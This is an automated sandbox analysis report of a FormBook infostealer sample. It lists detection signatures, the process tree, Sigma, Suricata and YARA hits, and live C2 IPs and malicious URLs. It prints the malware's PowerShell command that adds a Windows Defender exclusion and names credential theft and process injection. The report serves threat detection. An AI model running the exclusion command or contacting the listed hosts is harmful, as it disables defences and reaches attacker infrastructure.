Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1608104
MD5:79a197380a1362733eb1a0119879f36c
SHA1:e358e0c114af263a7b644f240499004042999090
SHA256:06f5012aaf05a5d9aefec7a060851cf3d7ddce0220cc09b30cd87d10d69ba554
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Child Processes Of SndVol.exe
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 79A197380A1362733EB1A0119879F36C)
    • powershell.exe (PID: 7656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7876 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • file.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 79A197380A1362733EB1A0119879F36C)
      • CQcxGFiNQWzmXwbg1.exe (PID: 5768 cmdline: "C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\6KD1rlOtC5Adl.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • SndVol.exe (PID: 8148 cmdline: "C:\Windows\SysWOW64\SndVol.exe" MD5: BD4A1CC3429ED1251E5185A72501839B)
          • CQcxGFiNQWzmXwbg1.exe (PID: 3524 cmdline: "C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\yF7gWooj.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 6460 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.3768384183.0000000004E30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.1669076954.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.1671103220.0000000001B30000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.3768451567.0000000004E80000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.3768386121.0000000002790000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.file.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.file.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7448, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7656, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7448, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7656, ProcessName: powershell.exe
                Sigma detected: Uncommon Child Processes Of SndVol.exe
                Source: Process startedAuthor: X__Junior (Nextron Systems): Data: Command: "C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\yF7gWooj.exe" , CommandLine: "C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\yF7gWooj.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe, NewProcessName: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe, OriginalFileName: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe, ParentCommandLine: "C:\Windows\SysWOW64\SndVol.exe", ParentImage: C:\Windows\SysWOW64\SndVol.exe, ParentProcessId: 8148, ParentProcessName: SndVol.exe, ProcessCommandLine: "C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\yF7gWooj.exe" , ProcessId: 3524, ProcessName: CQcxGFiNQWzmXwbg1.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7448, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7656, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-06T08:48:19.575571+010028554651A Network Trojan was detected192.168.2.1149979192.186.58.3180TCP
                2025-02-06T08:48:43.589523+010028554651A Network Trojan was detected192.168.2.114998492.60.36.19080TCP
                2025-02-06T08:48:56.962781+010028554651A Network Trojan was detected192.168.2.1149988188.114.96.380TCP
                2025-02-06T08:49:10.322023+010028554651A Network Trojan was detected192.168.2.1149992144.76.229.20380TCP
                2025-02-06T08:49:25.461509+010028554651A Network Trojan was detected192.168.2.1149996103.117.135.1380TCP
                2025-02-06T08:49:38.980894+010028554651A Network Trojan was detected192.168.2.115000013.248.169.4880TCP
                2025-02-06T08:49:52.144458+010028554651A Network Trojan was detected192.168.2.115000413.248.169.4880TCP
                2025-02-06T08:50:06.317624+010028554651A Network Trojan was detected192.168.2.1150008129.226.111.12280TCP
                2025-02-06T08:50:19.482834+010028554651A Network Trojan was detected192.168.2.115001284.32.84.3280TCP
                2025-02-06T08:50:32.776450+010028554651A Network Trojan was detected192.168.2.1150016192.64.118.22180TCP
                2025-02-06T08:50:47.164635+010028554651A Network Trojan was detected192.168.2.1150020198.187.31.21680TCP
                2025-02-06T08:51:01.537021+010028554651A Network Trojan was detected192.168.2.115002447.83.1.9080TCP
                2025-02-06T08:51:18.177810+010028554651A Network Trojan was detected192.168.2.115002846.38.243.23480TCP
                2025-02-06T08:51:32.449665+010028554651A Network Trojan was detected192.168.2.115003247.83.1.9080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-06T08:48:35.905320+010028554641A Network Trojan was detected192.168.2.114998192.60.36.19080TCP
                2025-02-06T08:48:38.452165+010028554641A Network Trojan was detected192.168.2.114998292.60.36.19080TCP
                2025-02-06T08:48:40.995860+010028554641A Network Trojan was detected192.168.2.114998392.60.36.19080TCP
                2025-02-06T08:48:49.287237+010028554641A Network Trojan was detected192.168.2.1149985188.114.96.380TCP
                2025-02-06T08:48:51.859078+010028554641A Network Trojan was detected192.168.2.1149986188.114.96.380TCP
                2025-02-06T08:48:54.377456+010028554641A Network Trojan was detected192.168.2.1149987188.114.96.380TCP
                2025-02-06T08:49:02.677256+010028554641A Network Trojan was detected192.168.2.1149989144.76.229.20380TCP
                2025-02-06T08:49:05.220354+010028554641A Network Trojan was detected192.168.2.1149990144.76.229.20380TCP
                2025-02-06T08:49:07.777664+010028554641A Network Trojan was detected192.168.2.1149991144.76.229.20380TCP
                2025-02-06T08:49:17.793048+010028554641A Network Trojan was detected192.168.2.1149993103.117.135.1380TCP
                2025-02-06T08:49:20.358560+010028554641A Network Trojan was detected192.168.2.1149994103.117.135.1380TCP
                2025-02-06T08:49:22.896494+010028554641A Network Trojan was detected192.168.2.1149995103.117.135.1380TCP
                2025-02-06T08:49:31.305661+010028554641A Network Trojan was detected192.168.2.114999713.248.169.4880TCP
                2025-02-06T08:49:33.862128+010028554641A Network Trojan was detected192.168.2.114999813.248.169.4880TCP
                2025-02-06T08:49:36.431046+010028554641A Network Trojan was detected192.168.2.114999913.248.169.4880TCP
                2025-02-06T08:49:44.486669+010028554641A Network Trojan was detected192.168.2.115000113.248.169.4880TCP
                2025-02-06T08:49:47.049714+010028554641A Network Trojan was detected192.168.2.115000213.248.169.4880TCP
                2025-02-06T08:49:50.650724+010028554641A Network Trojan was detected192.168.2.115000313.248.169.4880TCP
                2025-02-06T08:49:58.705343+010028554641A Network Trojan was detected192.168.2.1150005129.226.111.12280TCP
                2025-02-06T08:50:01.246079+010028554641A Network Trojan was detected192.168.2.1150006129.226.111.12280TCP
                2025-02-06T08:50:03.786946+010028554641A Network Trojan was detected192.168.2.1150007129.226.111.12280TCP
                2025-02-06T08:50:11.870960+010028554641A Network Trojan was detected192.168.2.115000984.32.84.3280TCP
                2025-02-06T08:50:14.388711+010028554641A Network Trojan was detected192.168.2.115001084.32.84.3280TCP
                2025-02-06T08:50:16.932530+010028554641A Network Trojan was detected192.168.2.115001184.32.84.3280TCP
                2025-02-06T08:50:25.113741+010028554641A Network Trojan was detected192.168.2.1150013192.64.118.22180TCP
                2025-02-06T08:50:27.654035+010028554641A Network Trojan was detected192.168.2.1150014192.64.118.22180TCP
                2025-02-06T08:50:30.240218+010028554641A Network Trojan was detected192.168.2.1150015192.64.118.22180TCP
                2025-02-06T08:50:38.495696+010028554641A Network Trojan was detected192.168.2.1150017198.187.31.21680TCP
                2025-02-06T08:50:41.059127+010028554641A Network Trojan was detected192.168.2.1150018198.187.31.21680TCP
                2025-02-06T08:50:44.663255+010028554641A Network Trojan was detected192.168.2.1150019198.187.31.21680TCP
                2025-02-06T08:50:53.699407+010028554641A Network Trojan was detected192.168.2.115002147.83.1.9080TCP
                2025-02-06T08:50:56.306736+010028554641A Network Trojan was detected192.168.2.115002247.83.1.9080TCP
                2025-02-06T08:50:58.939729+010028554641A Network Trojan was detected192.168.2.115002347.83.1.9080TCP
                2025-02-06T08:51:08.103558+010028554641A Network Trojan was detected192.168.2.115002546.38.243.23480TCP
                2025-02-06T08:51:10.666081+010028554641A Network Trojan was detected192.168.2.115002646.38.243.23480TCP
                2025-02-06T08:51:13.212946+010028554641A Network Trojan was detected192.168.2.115002746.38.243.23480TCP
                2025-02-06T08:51:24.701142+010028554641A Network Trojan was detected192.168.2.115002947.83.1.9080TCP
                2025-02-06T08:51:27.291133+010028554641A Network Trojan was detected192.168.2.115003047.83.1.9080TCP
                2025-02-06T08:51:29.837981+010028554641A Network Trojan was detected192.168.2.115003147.83.1.9080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.gnlokn.info/1hqx/Avira URL Cloud: Label: malware
                Source: http://www.82765.ltd/extg/Avira URL Cloud: Label: phishing
                Source: http://www.031235246.xyz/an37/?b8IlRP=EOo17e0b13RAPxLblUgE3vs/FGL0H2xQV++ddtKGVI4dgn5cY1anvW0mUjQ935dHimnK6XuAvySysVP8xdezNg5a6QtKc14a9RVleSg6ym/yobsLmIbuxYM=&gbp=5DC0NPr0EBEhlAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 30%Perma Link
                Source: file.exeReversingLabs: Detection: 34%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3768384183.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1669076954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1671103220.0000000001B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3768451567.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3768386121.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3757230807.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1671316261.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3768471999.0000000004260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: SndVol.pdbGCTL source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3762337231.000000000075E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: file.exe, 00000004.00000002.1669747825.00000000016E0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1677267972.0000000004EEE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1669757476.0000000004D34000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.000000000523E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.00000000050A0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000004.00000002.1669747825.00000000016E0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, SndVol.exe, 00000009.00000003.1677267972.0000000004EEE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1669757476.0000000004D34000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.000000000523E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.00000000050A0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: SndVol.pdb source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3762337231.000000000075E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000000.1584029398.0000000000C0F000.00000002.00000001.01000000.0000000C.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000000.1745800573.0000000000C0F000.00000002.00000001.01000000.0000000C.sdmp
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030AC7E0 FindFirstFileW,FindNextFileW,FindClose,9_2_030AC7E0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4x nop then xor eax, eax9_2_03099F10
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4x nop then mov ebx, 00000004h9_2_04F804DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49979 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50002 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49996 -> 103.117.135.13:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49981 -> 92.60.36.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49986 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49992 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49995 -> 103.117.135.13:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49993 -> 103.117.135.13:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50006 -> 129.226.111.122:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50000 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50005 -> 129.226.111.122:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50014 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49999 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49990 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50003 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49984 -> 92.60.36.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50020 -> 198.187.31.216:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50025 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49991 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50007 -> 129.226.111.122:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50019 -> 198.187.31.216:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50026 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50001 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49994 -> 103.117.135.13:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50013 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50008 -> 129.226.111.122:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49985 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50004 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50029 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49983 -> 92.60.36.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49997 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50028 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50022 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50017 -> 198.187.31.216:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50011 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50021 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50010 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50031 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50024 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49988 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50023 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50009 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50018 -> 198.187.31.216:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50030 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49982 -> 92.60.36.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50016 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50027 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50015 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49987 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49989 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50012 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50032 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49998 -> 13.248.169.48:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.031235246.xyz
                Source: DNS query: www.autonomousrich.xyz
                Source: DNS query: www.matindi.xyz
                Source: DNS query: www.ticquan.xyz
                Source: DNS query: www.infiniteture.xyz
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 192.64.118.221 192.64.118.221
                Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
